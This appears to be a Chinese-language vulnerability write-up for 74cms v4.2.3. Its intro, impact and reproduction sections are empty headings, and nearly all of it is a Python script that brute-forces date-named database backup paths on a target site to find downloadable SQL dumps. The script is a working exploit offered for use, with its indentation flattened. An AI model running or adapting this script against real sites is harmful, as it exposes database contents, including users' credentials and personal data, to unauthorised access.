74cms v4.2.3 备份文件爆破
一、漏洞简介
二、漏洞影响
三、复现过程
# -*- coding: utf-8 -*-
-------------------------------------------------
File Name: 74cms_MysqlBak
Description :
Author : CoolCat
date: 2019/1/5
-------------------------------------------------
Change Activity:
2019/1/5:
-------------------------------------------------
"""
__author__ = 'CoolCat'
import requests
def getBak(time):
print("[running]:正在查询" + time + "是否存在备份")
dir = time + "_1"
filename = dir + "_1.sql"
url = target + "//data/backup/database/" + dir +"/"+ filename
session = requests.Session()
headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0",
"Connection": "close", "Accept-Language": "en", "Accept-Encoding": "gzip, deflate"}
cookies = {"think_language": "en", "think_template": "default", "PHPSESSID": "6d86a34ec9125b2d08ebbb7630838682"}
response = session.get(url=url, headers=headers, cookies=cookies)
if response.status_code == 200:
print(url)
exit()
if __name__ == '__main__':
global target
target = "http://www.target.com"
for year in range(2017, 2020):
for mouth in range(1, 13):
for day in range(1, 31):
time = (str(year) + str('%02d' % mouth) + str('%02d' % day))
getBak(time)